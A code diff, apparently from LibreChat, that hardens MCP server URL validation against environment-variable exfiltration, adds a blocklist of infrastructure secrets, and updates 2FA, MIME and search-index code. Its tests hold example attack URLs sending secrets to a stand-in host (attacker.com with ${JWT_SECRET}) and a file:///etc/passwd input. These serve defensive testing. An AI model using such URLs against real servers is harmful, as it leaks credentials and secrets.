b/packages/data-provider/specs/mcp.spec.ts @@ -0,0 +1,147 @@ +import { SSEOptionsSchema, MCPServerUserInputSchema } from '../src/mcp'; + +describe('MCPServerUserInputSchema', () => { + describe('env variable exfiltration prevention', () => { + it('should confirm admin schema resolves env vars (attack vector baseline)', () => { + process.env.FAKE_SECRET = 'leaked-secret-value'; + const adminResult = SSEOptionsSchema.safeParse({ + type: 'sse', + url: 'http://attacker.com/?secret=${FAKE_SECRET}', + }); + expect(adminResult.success).toBe(true); + if (adminResult.success) { + 
expect(adminResult.data.url).toContain('leaked-secret-value'); + } + delete process.env.FAKE_SECRET; + }); + + it('should reject the same URL through user input schema', () => { + process.env.FAKE_SECRET = 'leaked-secret-value'; + const userResult = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'http://attacker.com/?secret=${FAKE_SECRET}', + }); + expect(userResult.success).toBe(false); + delete process.env.FAKE_SECRET; + }); + }); + + describe('env variable rejection', () => { + it('should reject SSE URLs containing env variable patterns', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'http://attacker.com/?secret=${FAKE_SECRET}', + }); + expect(result.success).toBe(false); + }); + + it('should reject streamable-http URLs containing env variable patterns', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'streamable-http', + url: 'http://attacker.com/?jwt=${JWT_SECRET}', + }); + expect(result.success).toBe(false); + }); + + it('should reject WebSocket URLs containing env variable patterns', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'websocket', + url: 'ws://attacker.com/?secret=${FAKE_SECRET}', + }); + expect(result.success).toBe(false); + }); + }); + + describe('protocol allowlisting', () => { + it('should reject file:// URLs for SSE', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'file:///etc/passwd', + }); + expect(result.success).toBe(false); + }); + + it('should reject ftp:// URLs for streamable-http', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'streamable-http', + url: 'ftp://internal-server/data', + }); + expect(result.success).toBe(false); + }); + + it('should reject http:// URLs for WebSocket', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'websocket', + url: 'http://example.com/ws', + }); + expect(result.success).toBe(false); + }); + + it('should reject ws:// URLs for 
SSE', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'ws://example.com/sse', + }); + expect(result.success).toBe(false); + }); + }); + + describe('valid URL acceptance', () => { + it('should accept valid https:// SSE URLs', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'https://mcp-server.com/sse', + }); + expect(result.success).toBe(true); + if (result.success) { + expect(result.data.url).toBe('https://mcp-server.com/sse'); + } + }); + + it('should accept valid http:// SSE URLs', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'sse', + url: 'http://mcp-server.com/sse', + }); + expect(result.success).toBe(true); + }); + + it('should accept valid wss:// WebSocket URLs', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'websocket', + url: 'wss://mcp-server.com/ws', + }); + expect(result.success).toBe(true); + if (result.success) { + expect(result.data.url).toBe('wss://mcp-server.com/ws'); + } + }); + + it('should accept valid ws:// WebSocket URLs', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'websocket', + url: 'ws://mcp-server.com/ws', + }); + expect(result.success).toBe(true); + }); + + it('should accept valid https:// streamable-http URLs', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'streamable-http', + url: 'https://mcp-server.com/http', + }); + expect(result.success).toBe(true); + if (result.success) { + expect(result.data.url).toBe('https://mcp-server.com/http'); + } + }); + + it('should accept valid http:// streamable-http URLs with "http" alias', () => { + const result = MCPServerUserInputSchema.safeParse({ + type: 'http', + url: 'http://mcp-server.com/mcp', + }); + expect(result.success).toBe(true); + }); + }); +}); diff --git a/packages/data-provider/specs/utils.spec.ts b/packages/data-provider/specs/utils.spec.ts index 01c403f4e8..48df6d46c2 100644 --- 
a/packages/data-provider/specs/utils.spec.ts +++ b/packages/data-provider/specs/utils.spec.ts @@ -1,4 +1,4 @@ -import { extractEnvVariable } from '../src/utils'; +import { extractEnvVariable, isSensitiveEnvVar } from '../src/utils'; describe('Environment Variable Extraction', () => { const originalEnv = process.env; @@ -7,7 +7,7 @@ describe('Environment Variable Extraction', () => { process.env = { ...originalEnv, TEST_API_KEY: 'test-api-key-value', - ANOTHER_SECRET: 'another-secret-value', + ANOTHER_VALUE: 'another-value', }; }); @@ -55,7 +55,7 @@ describe('Environment Variable Extraction', () => { describe('extractEnvVariable function', () => { it('should extract environment variables from exact matches', () => { expect(extractEnvVariable('${TEST_API_KEY}')).toBe('test-api-key-value'); - expect(extractEnvVariable('${ANOTHER_SECRET}')).toBe('another-secret-value'); + expect(extractEnvVariable('${ANOTHER_VALUE}')).toBe('another-value'); }); it('should extract environment variables from strings with prefixes', () => { @@ -82,7 +82,7 @@ describe('Environment Variable Extraction', () => { describe('extractEnvVariable', () => { it('should extract environment variable values', () => { expect(extractEnvVariable('${TEST_API_KEY}')).toBe('test-api-key-value'); - expect(extractEnvVariable('${ANOTHER_SECRET}')).toBe('another-secret-value'); + expect(extractEnvVariable('${ANOTHER_VALUE}')).toBe('another-value'); }); it('should return the original string if environment variable is not found', () => { @@ -126,4 +126,71 @@ describe('Environment Variable Extraction', () => { ); }); }); + + describe('isSensitiveEnvVar', () => { + it('should flag infrastructure secrets', () => { + expect(isSensitiveEnvVar('JWT_SECRET')).toBe(true); + expect(isSensitiveEnvVar('JWT_REFRESH_SECRET')).toBe(true); + expect(isSensitiveEnvVar('CREDS_KEY')).toBe(true); + expect(isSensitiveEnvVar('CREDS_IV')).toBe(true); + expect(isSensitiveEnvVar('MEILI_MASTER_KEY')).toBe(true); + 
expect(isSensitiveEnvVar('MONGO_URI')).toBe(true); + expect(isSensitiveEnvVar('REDIS_URI')).toBe(true); + expect(isSensitiveEnvVar('REDIS_PASSWORD')).toBe(true); + }); + + it('should allow non-infrastructure vars through (including operator-configured secrets)', () => { + expect(isSensitiveEnvVar('OPENAI_API_KEY')).toBe(false); + expect(isSensitiveEnvVar('ANTHROPIC_API_KEY')).toBe(false); + expect(isSensitiveEnvVar('GOOGLE_KEY')).toBe(false); + expect(isSensitiveEnvVar('PROXY')).toBe(false); + expect(isSensitiveEnvVar('DEBUG_LOGGING')).toBe(false); + expect(isSensitiveEnvVar('DOMAIN_CLIENT')).toBe(false); + expect(isSensitiveEnvVar('APP_TITLE')).toBe(false); + expect(isSensitiveEnvVar('OPENID_CLIENT_SECRET')).toBe(false); + expect(isSensitiveEnvVar('DISCORD_CLIENT_SECRET')).toBe(false); + expect(isSensitiveEnvVar('MY_CUSTOM_SECRET')).toBe(false); + }); + }); + + describe('extractEnvVariable sensitive var blocklist', () => { + beforeEach(() => { + process.env.JWT_SECRET = 'super-secret-jwt'; + process.env.JWT_REFRESH_SECRET = 'super-secret-refresh'; + process.env.CREDS_KEY = 'encryption-key'; + process.env.CREDS_IV = 'encryption-iv'; + process.env.MEILI_MASTER_KEY = 'meili-key'; + process.env.MONGO_URI = 'mongodb://user:pass@host/db'; + process.env.REDIS_URI = 'redis://:pass@host:6379'; + process.env.REDIS_PASSWORD = 'redis-pass'; + process.env.OPENAI_API_KEY = 'sk-legit-key'; + }); + + it('should refuse to resolve sensitive vars (single-match path)', () => { + expect(extractEnvVariable('${JWT_SECRET}')).toBe('${JWT_SECRET}'); + expect(extractEnvVariable('${JWT_REFRESH_SECRET}')).toBe('${JWT_REFRESH_SECRET}'); + expect(extractEnvVariable('${CREDS_KEY}')).toBe('${CREDS_KEY}'); + expect(extractEnvVariable('${CREDS_IV}')).toBe('${CREDS_IV}'); + expect(extractEnvVariable('${MEILI_MASTER_KEY}')).toBe('${MEILI_MASTER_KEY}'); + expect(extractEnvVariable('${MONGO_URI}')).toBe('${MONGO_URI}'); + expect(extractEnvVariable('${REDIS_URI}')).toBe('${REDIS_URI}'); + 
expect(extractEnvVariable('${REDIS_PASSWORD}')).toBe('${REDIS_PASSWORD}'); + }); + + it('should refuse to resolve sensitive vars in composite strings (multi-match path)', () => { + expect(extractEnvVariable('key=${JWT_SECRET}&more')).toBe('key=${JWT_SECRET}&more'); + expect(extractEnvVariable('db=${MONGO_URI}/extra')).toBe('db=${MONGO_URI}/extra'); + }); + + it('should still resolve non-sensitive vars normally', () => { + expect(extractEnvVariable('${OPENAI_API_KEY}')).toBe('sk-legit-key'); + expect(extractEnvVariable('Bearer ${OPENAI_API_KEY}')).toBe('Bearer sk-legit-key'); + }); + + it('should resolve non-sensitive vars while blocking sensitive ones in the same string', () => { + expect(extractEnvVariable('key=${OPENAI_API_KEY}&secret=${JWT_SECRET}')).toBe( + 'key=sk-legit-key&secret=${JWT_SECRET}', + ); + }); + }); }); diff --git a/packages/data-provider/src/accessPermissions.ts b/packages/data-provider/src/accessPermissions.ts index f2431fcf9a..bc97458076 100644 --- a/packages/data-provider/src/accessPermissions.ts +++ b/packages/data-provider/src/accessPermissions.ts @@ -200,9 +200,9 @@ export type TUpdateResourcePermissionsResponse = z.infer< * Principal search request parameters */ export type TPrincipalSearchParams = { - q: string; // search query (required) - limit?: number; // max results (1-50, default 10) - type?: PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE; // filter by type (optional) + q: string; + limit?: number; + types?: Array; }; /** @@ -228,7 +228,7 @@ export type TPrincipalSearchResult = { export type TPrincipalSearchResponse = { query: string; limit: number; - type?: PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE; + types?: Array | null; results: TPrincipalSearchResult[]; count: number; sources: { diff --git a/packages/data-provider/src/config.ts b/packages/data-provider/src/config.ts index e13521c019..bb0c180209 100644 --- a/packages/data-provider/src/config.ts +++ b/packages/data-provider/src/config.ts @@ 
-1560,6 +1560,10 @@ export enum ErrorTypes { * No Base URL Provided. */ NO_BASE_URL = 'no_base_url', + /** + * Base URL targets a restricted or invalid address (SSRF protection). + */ + INVALID_BASE_URL = 'invalid_base_url', /** * Moderation error */ diff --git a/packages/data-provider/src/data-service.ts b/packages/data-provider/src/data-service.ts index be5cccd43b..2c7a402d1f 100644 --- a/packages/data-provider/src/data-service.ts +++ b/packages/data-provider/src/data-service.ts @@ -21,8 +21,8 @@ export function revokeAllUserKeys(): Promise { return request.delete(endpoints.revokeAllUserKeys()); } -export function deleteUser(): Promise { - return request.delete(endpoints.deleteUser()); +export function deleteUser(payload?: t.TDeleteUserRequest): Promise { + return request.deleteWithOptions(endpoints.deleteUser(), { data: payload }); } export type FavoriteItem = { @@ -970,8 +970,8 @@ export function updateFeedback( } // 2FA -export function enableTwoFactor(): Promise { - return request.get(endpoints.enableTwoFactor()); +export function enableTwoFactor(payload?: t.TEnable2FARequest): Promise { + return request.post(endpoints.enableTwoFactor(), payload); } export function verifyTwoFactor(payload: t.TVerify2FARequest): Promise { @@ -986,8 +986,10 @@ export function disableTwoFactor(payload?: t.TDisable2FARequest): Promise { - return request.post(endpoints.regenerateBackupCodes()); +export function regenerateBackupCodes( + payload?: t.TRegenerateBackupCodesRequest, +): Promise { + return request.post(endpoints.regenerateBackupCodes(), payload); } export function verifyTwoFactorTemp( diff --git a/packages/data-provider/src/file-config.spec.ts b/packages/data-provider/src/file-config.spec.ts index 018b4dbfcf..0ab9f23a3e 100644 --- a/packages/data-provider/src/file-config.spec.ts +++ b/packages/data-provider/src/file-config.spec.ts @@ -1,15 +1,52 @@ import type { FileConfig } from './types/files'; import { fileConfig as baseFileConfig, + documentParserMimeTypes, 
getEndpointFileConfig, - mergeFileConfig, applicationMimeTypes, defaultOCRMimeTypes, - documentParserMimeTypes, supportedMimeTypes, + mergeFileConfig, + inferMimeType, + textMimeTypes, } from './file-config'; import { EModelEndpoint } from './schemas'; +describe('inferMimeType', () => { + it('should normalize text/x-python-script to text/x-python', () => { + expect(inferMimeType('test.py', 'text/x-python-script')).toBe('text/x-python'); + }); + + it('should return a type that matches textMimeTypes after normalization', () => { + const normalized = inferMimeType('test.py', 'text/x-python-script'); + expect(textMimeTypes.test(normalized)).toBe(true); + }); + + it('should pass through standard browser types unchanged', () => { + expect(inferMimeType('test.py', 'text/x-python')).toBe('text/x-python'); + expect(inferMimeType('doc.pdf', 'application/pdf')).toBe('application/pdf'); + }); + + it('should infer from extension when browser type is empty', () => { + expect(inferMimeType('test.py', '')).toBe('text/x-python'); + expect(inferMimeType('code.js', '')).toBe('text/javascript'); + expect(inferMimeType('photo.heic', '')).toBe('image/heic'); + }); + + it('should return empty string for unknown extension with no browser type', () => { + expect(inferMimeType('file.xyz', '')).toBe(''); + }); + + it('should produce a type accepted by checkType after normalizing text/x-python-script', () => { + const normalized = inferMimeType('test.py', 'text/x-python-script'); + expect(baseFileConfig.checkType(normalized)).toBe(true); + }); + + it('should reject raw text/x-python-script without normalization', () => { + expect(baseFileConfig.checkType('text/x-python-script')).toBe(false); + }); +}); + describe('applicationMimeTypes', () => { const odfTypes = [ 'application/vnd.oasis.opendocument.text', diff --git a/packages/data-provider/src/file-config.ts b/packages/data-provider/src/file-config.ts index 033c868a80..67b4197958 100644 --- a/packages/data-provider/src/file-config.ts +++ 
b/packages/data-provider/src/file-config.ts @@ -357,15 +357,21 @@ export const imageTypeMapping: { [key: string]: string } = { heif: 'image/heif', }; +/** Normalizes non-standard MIME types that browsers may report to their canonical forms */ +export const mimeTypeAliases: Readonly> = { + 'text/x-python-script': 'text/x-python', +}; + /** - * Infers the MIME type from a file's extension when the browser doesn't recognize it - * @param fileName - The name of the file including extension - * @param currentType - The current MIME type reported by the browser (may be empty) - * @returns The inferred MIME type if browser didn't provide one, otherwise the original type + * Infers the MIME type from a file's extension when the browser doesn't recognize it, + * and normalizes known non-standard MIME type aliases to their canonical forms. + * @param fileName - The file name including its extension + * @param currentType - The MIME type reported by the browser (may be empty string) + * @returns The normalized or inferred MIME type; empty string if unresolvable */ export function inferMimeType(fileName: string, currentType: string): string { if (currentType) { - return currentType; + return mimeTypeAliases[currentType] ?? currentType; } const extension = fileName.split('.').pop()?.toLowerCase() ?? ''; diff --git a/packages/data-provider/src/mcp.ts b/packages/data-provider/src/mcp.ts index b0042b3b65..2fe22525aa 100644 --- a/packages/data-provider/src/mcp.ts +++ b/packages/data-provider/src/mcp.ts @@ -226,6 +226,23 @@ const omitServerManagedFields = >(schema: T oauth_headers: true, }); +const envVarPattern = /\$\{[^}]+\}/; +const isWsProtocol = (val: string): boolean => /^wss?:/i.test(val); +const isHttpProtocol = (val: string): boolean => /^https?:/i.test(val); + +/** + * Builds a URL schema for user input that rejects ${VAR} env variable patterns + * and validates protocol constraints without resolving environment variables. 
+ */ +const userUrlSchema = (protocolCheck: (val: string) => boolean, message: string) => + z + .string() + .refine((val) => !envVarPattern.test(val), { + message: 'Environment variable references are not allowed in URLs', + }) + .pipe(z.string().url()) + .refine(protocolCheck, { message }); + /** * MCP Server configuration that comes from UI/API input only. * Omits server-managed fields like startup, timeout, customUserVars, etc. @@ -235,11 +252,23 @@ const omitServerManagedFields = >(schema: T * Stdio allows arbitrary command execution and should only be configured * by administrators via the YAML config file (librechat.yaml). * Only remote transports (SSE, HTTP, WebSocket) are allowed via the API. + * + * SECURITY: URL fields use userUrlSchema instead of the admin schemas' + * extractEnvVariable transform to prevent env variable exfiltration + * through user-controlled URLs (e.g. http://attacker.com/?k=${JWT_SECRET}). + * Protocol checks use positive allowlists (http(s) / ws(s)) to block + * file://, ftp://, javascript:, and other non-network schemes. 
*/ export const MCPServerUserInputSchema = z.union([ - omitServerManagedFields(WebSocketOptionsSchema), - omitServerManagedFields(SSEOptionsSchema), - omitServerManagedFields(StreamableHTTPOptionsSchema), + omitServerManagedFields(WebSocketOptionsSchema).extend({ + url: userUrlSchema(isWsProtocol, 'WebSocket URL must use ws:// or wss://'), + }), + omitServerManagedFields(SSEOptionsSchema).extend({ + url: userUrlSchema(isHttpProtocol, 'SSE URL must use http:// or https://'), + }), + omitServerManagedFields(StreamableHTTPOptionsSchema).extend({ + url: userUrlSchema(isHttpProtocol, 'Streamable HTTP URL must use http:// or https://'), + }), ]); export type MCPServerUserInput = z.infer; diff --git a/packages/data-provider/src/types.ts b/packages/data-provider/src/types.ts index 3b04c40f45..5895fba321 100644 --- a/packages/data-provider/src/types.ts +++ b/packages/data-provider/src/types.ts @@ -425,28 +425,29 @@ export type TLoginResponse = { tempToken?: string; }; +/** Shared payload for any operation that requires OTP or backup-code verification. */ +export type TOTPVerificationPayload = { + token?: string; + backupCode?: string; +}; + +export type TEnable2FARequest = TOTPVerificationPayload; + export type TEnable2FAResponse = { otpauthUrl: string; backupCodes: string[]; message?: string; }; -export type TVerify2FARequest = { - token?: string; - backupCode?: string; -}; +export type TVerify2FARequest = TOTPVerificationPayload; export type TVerify2FAResponse = { message: string; }; -/** - * For verifying 2FA during login with a temporary token. - */ -export type TVerify2FATempRequest = { +/** For verifying 2FA during login with a temporary token. */ +export type TVerify2FATempRequest = TOTPVerificationPayload & { tempToken: string; - token?: string; - backupCode?: string; }; export type TVerify2FATempResponse = { @@ -455,30 +456,22 @@ export type TVerify2FATempResponse = { message?: string; }; -/** - * Request for disabling 2FA. 
- */ -export type TDisable2FARequest = { - token?: string; - backupCode?: string; -}; +export type TDisable2FARequest = TOTPVerificationPayload; -/** - * Response from disabling 2FA. - */ export type TDisable2FAResponse = { message: string; }; -/** - * Response from regenerating backup codes. - */ +export type TRegenerateBackupCodesRequest = TOTPVerificationPayload; + export type TRegenerateBackupCodesResponse = { - message: string; + message?: string; backupCodes: string[]; - backupCodesHash: string[]; + backupCodesHash: TBackupCode[]; }; +export type TDeleteUserRequest = TOTPVerificationPayload; + export type TRequestPasswordReset = { email: string; }; diff --git a/packages/data-provider/src/utils.ts b/packages/data-provider/src/utils.ts index 57abbf0495..1eefcff8c4 100644 --- a/packages/data-provider/src/utils.ts +++ b/packages/data-provider/src/utils.ts @@ -1,5 +1,29 @@ export const envVarRegex = /^\${(.+)}$/; +/** + * Infrastructure env vars that must never be resolved via placeholder expansion. + * These are internal secrets whose exposure would compromise the system — + * they have no legitimate reason to appear in outbound headers, MCP env/args, or OAuth config. + * + * Intentionally excludes API keys (operators reference them in config) and + * OAuth/session secrets (referenced in MCP OAuth config via processMCPEnv). + */ +const SENSITIVE_ENV_VARS = new Set([ + 'JWT_SECRET', + 'JWT_REFRESH_SECRET', + 'CREDS_KEY', + 'CREDS_IV', + 'MEILI_MASTER_KEY', + 'MONGO_URI', + 'REDIS_URI', + 'REDIS_PASSWORD', +]); + +/** Returns true when `varName` refers to an infrastructure secret that must not leak. 
*/ +export function isSensitiveEnvVar(varName: string): boolean { + return SENSITIVE_ENV_VARS.has(varName); +} + /** Extracts the environment variable name from a template literal string */ export function extractVariableName(value: string): string | null { if (!value) { @@ -16,21 +40,20 @@ export function extractEnvVariable(value: string) { return value; } - // Trim the input const trimmed = value.trim(); - // Special case: if it's just a single environment variable const singleMatch = trimmed.match(envVarRegex); if (singleMatch) { const varName = singleMatch[1]; + if (isSensitiveEnvVar(varName)) { + return trimmed; + } return process.env[varName] || trimmed; } - // For multiple variables, process them using a regex loop const regex = /\${([^}]+)}/g; let result = trimmed; - // First collect all matches and their positions const matches = []; let match; while ((match = regex.exec(trimmed)) !== null) { @@ -41,12 +64,12 @@ export function extractEnvVariable(value: string) { }); } - // Process matches in reverse order to avoid position shifts for (let i = matches.length - 1; i >= 0; i--) { const { fullMatch, varName, index } = matches[i]; + if (isSensitiveEnvVar(varName)) { + continue; + } const envValue = process.env[varName] || fullMatch; - - // Replace at exact position result = result.substring(0, index) + envValue + result.substring(index + fullMatch.length); } diff --git a/packages/data-schemas/src/models/plugins/mongoMeili.ts b/packages/data-schemas/src/models/plugins/mongoMeili.ts index 66530e2aba..cc01dbb6c7 100644 --- a/packages/data-schemas/src/models/plugins/mongoMeili.ts +++ b/packages/data-schemas/src/models/plugins/mongoMeili.ts @@ -1,7 +1,7 @@ import _ from 'lodash'; -import { MeiliSearch } from 'meilisearch'; import { parseTextParts } from 'librechat-data-provider'; -import type { SearchResponse, SearchParams, Index } from 'meilisearch'; +import { MeiliSearch, MeiliSearchTimeOutError } from 'meilisearch'; +import type { SearchResponse, SearchParams, 
Index, MeiliSearchErrorInfo } from 'meilisearch'; import type { CallbackWithoutResultAndOptionalError, FilterQuery, @@ -581,7 +581,6 @@ export default function mongoMeili(schema: Schema, options: MongoMeiliOptions): /** Create index only if it doesn't exist */ const index = client.index(indexName); - // Check if index exists and create if needed (async () => { try { await index.getRawInfo(); @@ -591,18 +590,34 @@ export default function mongoMeili(schema: Schema, options: MongoMeiliOptions): if (errorCode === 'index_not_found') { try { logger.info(`[mongoMeili] Creating new index: ${indexName}`); - await client.createIndex(indexName, { primaryKey }); - logger.info(`[mongoMeili] Successfully created index: ${indexName}`); + const enqueued = await client.createIndex(indexName, { primaryKey }); + const task = await client.waitForTask(enqueued.taskUid, { + timeOutMs: 10000, + intervalMs: 100, + }); + logger.debug(`[mongoMeili] Index ${indexName} creation task:`, task); + if (task.status !== 'succeeded') { + const taskError = task.error as MeiliSearchErrorInfo | null; + if (taskError?.code === 'index_already_exists') { + logger.debug(`[mongoMeili] Index ${indexName} was created by another instance`); + } else { + logger.warn(`[mongoMeili] Index ${indexName} creation failed:`, taskError); + } + } else { + logger.info(`[mongoMeili] Successfully created index: ${indexName}`); + } } catch (createError) { - // Index might have been created by another instance - logger.debug(`[mongoMeili] Index ${indexName} may already exist:`, createError); + if (createError instanceof MeiliSearchTimeOutError) { + logger.warn(`[mongoMeili] Timed out waiting for index ${indexName} creation`); + } else { + logger.warn(`[mongoMeili] Error creating index ${indexName}:`, createError); + } } } else { logger.error(`[mongoMeili] Error checking index ${indexName}:`, error); } } - // Configure index settings to make 'user' field filterable try { await index.updateSettings({ filterableAttributes: 
['user'], diff --git a/packages/data-schemas/src/schema/user.ts b/packages/data-schemas/src/schema/user.ts index c2bdc6fd34..57c8f8574e 100644 --- a/packages/data-schemas/src/schema/user.ts +++ b/packages/data-schemas/src/schema/user.ts @@ -121,6 +121,15 @@ const userSchema = new Schema( type: [BackupCodeSchema], select: false, }, + pendingTotpSecret: { + type: String, + select: false, + }, + pendingBackupCodes: { + type: [BackupCodeSchema], + select: false, + default: undefined, + }, refreshToken: { type: [SessionSchema], }, diff --git a/packages/data-schemas/src/types/user.ts b/packages/data-schemas/src/types/user.ts index a78c4679f2..e1cecb7518 100644 --- a/packages/data-schemas/src/types/user.ts +++ b/packages/data-schemas/src/types/user.ts @@ -26,6 +26,12 @@ export interface IUser extends Document { used: boolean; usedAt?: Date | null; }>; + pendingTotpSecret?: string; + pendingBackupCodes?: Array<{ + codeHash: string; + used: boolean; + usedAt?: Date | null; + }>; refreshToken?: Array<{ refreshToken: string; }>;